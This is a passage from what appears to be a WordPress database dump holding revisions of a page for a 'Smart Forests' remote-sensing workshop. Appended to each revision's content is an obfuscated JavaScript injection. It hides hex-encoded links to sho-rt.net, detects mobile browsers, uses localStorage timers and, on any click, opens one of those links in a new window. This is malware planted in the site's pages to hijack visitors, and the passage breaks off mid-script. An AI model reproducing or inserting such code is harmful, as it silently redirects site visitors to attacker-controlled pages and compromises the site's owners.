_0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Smart Forests – Multi-scale forest ecosystem assessment and monitoring using remote sensing, artificial intelligence, and robotics</strong>','','inherit','closed','closed','','3049-revision-v1','','','2022-11-08 19:40:49','2022-11-08 19:40:49','',3049,'https://gsw2023.com/?p=3053',0,'revision','',0),
(3054,1,'2022-11-08 19:43:00','2022-11-08 19:43:00','<p>[vc_row][vc_column][vc_separator color=\"green\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:black;\"><strong>This Smart Forests workshop focuses on the assessment and monitoring of forest ecosystems using state-of-the-art Remote Sensing (RS), artificial intelligence (AI), and robotics. Highlighted in this workshop will be emerging topics on data acquisition, pre-processing, information extraction, and forest remote sensing applications to support improved understanding of forest ecosystems, efficient management of forest resources, and multi-scale approaches for forest assessment and monitoring. One of the aims of this workshop will be to encourage discussions on innovative robotic operation of sensors, platforms, and AI powered processing technologies, from the perspectives of practical applications. The workshop also encourages the benchmarking of various data sources and processing methods for extracting key forest metrics and attributes and modelling forest processes.</strong></h5>\n<h5><strong>This workshop is jointly organized by</strong></h5>\n<ul>\n<li>\n<h5><strong>WGIII/1 Remote Sensing data processing and understanding</strong></h5>\n</li>\n<li>\n<h5><strong>WGI/7 Data quality and benchmark of sensors</strong></h5>\n</li>\n<li>\n<h5><strong>WGIII/8 Remote sensing for agricultural and natural ecosystems</strong></h5>\n</li>\n</ul>\n<p>[/vc_column_text][vc_separator color=\"green\" style=\"shadow\" border_width=\"5\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"57\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Smart Forests – Multi-scale forest ecosystem assessment and monitoring using remote sensing, artificial intelligence, and robotics</strong>','','inherit','closed','closed','','3049-revision-v1','','','2022-11-08 19:43:00','2022-11-08 19:43:00','',3049,'https://gsw2023.com/?p=3054',0,'revision','',0),
(3055,1,'2022-11-08 19:45:23','2022-11-08 19:45:23','<p>[vc_row][vc_column][vc_separator color=\"green\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:black;\"><strong>This Smart Forests workshop focuses on the assessment and monitoring of forest ecosystems using state-of-the-art Remote Sensing (RS), artificial intelligence (AI), and robotics. Highlighted in this workshop will be emerging topics on data acquisition, pre-processing, information extraction, and forest remote sensing applications to support improved understanding of forest ecosystems, efficient management of forest resources, and multi-scale approaches for forest assessment and monitoring. One of the aims of this workshop will be to encourage discussions on innovative robotic operation of sensors, platforms, and AI powered processing technologies, from the perspectives of practical applications. The workshop also encourages the benchmarking of various data sources and processing methods for extracting key forest metrics and attributes and modelling forest processes.</strong></h5>\n<h5><strong>This workshop is jointly organized by</strong></h5>\n<ul>\n<li>\n<h5><strong>WGIII/1 Remote Sensing data processing and understanding</strong></h5>\n</li>\n<li>\n<h5><strong>WGI/7 Data quality and benchmark of sensors</strong></h5>\n</li>\n<li>\n<h5><strong>WGIII/8 Remote sensing for agricultural and natural ecosystems</strong></h5>\n</li>\n</ul>\n<p>[/vc_column_text][vc_separator color=\"green\" style=\"shadow\" border_width=\"5\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"57\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h2>CO-CHAIRS</h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"58\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a 